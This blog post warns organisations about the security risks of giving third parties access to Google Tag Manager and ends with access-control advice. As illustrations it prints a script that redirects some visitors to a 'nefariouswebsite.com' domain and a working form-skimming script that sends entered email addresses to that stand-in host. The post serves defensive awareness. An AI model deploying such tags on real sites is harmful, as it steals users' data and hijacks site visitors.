There are lots of potential 3rd parties who might need to add tracking tags to your website, for example:
- Marketing agencies
- Creative agencies
- Data analysts
- UX experts
- Developers
Google Tag Manager is a great tool to centralise and streamline these tags, but often we see organisations grant these 3rd parties direct access to their Google Tag Manager account. While this might be ok if you are a small organisation that works with one 3rd party, you should definitely avoid it if your organisation is any bigger.
One potential issue with having multiple parties make their own changes is that they might not follow any of your already established conventions. Third parties might try to reinvent the wheel, add redundant tags or add wrong tags, which is something we often see. In addition to them potentially not working, these tags can affect other tracking, or even your whole website (to say nothing about unnecessarily adding to browser load times).
But the biggest reason to keep access to a minimum is security. That’s not to say your providers are dodgy, but every new account with access is an account that can be hacked by someone else. Most people aren’t aware how much damage can be done to your website from inside GTM, so here are a few examples that will hopefully scare you into doing a security audit.
I can deploy this tag on your website to make the background green:
<div class="code-to-copy"><pre><code>
<style>
body {background-color:green !important}
</style>
</code></pre></div>I can deploy this tag on your website to just redirect users to my nefarious website. I can even do it 10% of the time so that it would take much longer to be discovered. As you can see it’s not a lot of code:
<div class="code-to-copy"><pre><code>
<script>
if(Math.random()*10<1)window.location.replace("http://nefariouswebsite.com");
</script>
</code></pre></div>Let’s do worse. This tag will grab any email address entered into any email form field on your website and send the email address to the nefarious website. Again, we are showing this to highlight how trivial it is:
<div class="code-to-copy"><pre><code>
<script>
//Define which fields look like email address fields on the page
var css = "input[type*=email],input[class*=email],input[name*=email],*[class*=email] input";
//Grab these fields off the page
var myFields = document.querySelectorAll(css);
//Go through each field and execute a function whenever the user leaves a field
for(var j=0;j<myFields.length;j++)myFields[j].addEventListener("blur", fetchData.bind(null),false);
//The function that gets executed: grab the field's value and send an HTTP request to a nefarious
//website with that value
function fetchData(e) {
var email = e.target.value;
var request = new XMLHttpRequest();
request.open("GET", "https://nefariouswebsite.com/save-email.php?email="+email);
request.send();
}
</script>
</code></pre></div>We won’t show the code for doing the same to a credit card number field but it’s not much different to the above!
So what can you do?
- Limit the number of accounts with GTM access
- Make sure any Google accounts with GTM access have 2 factor authentication enabled
- If you need to grant access, choose a level where they can only make changes but not publish them. This still leaves you with the ability to review the changes and decide whether or not they will be published.
- Document your GTM conventions/setup and share it with any 3rd parties and internal team members who might make changes.
Good luck!
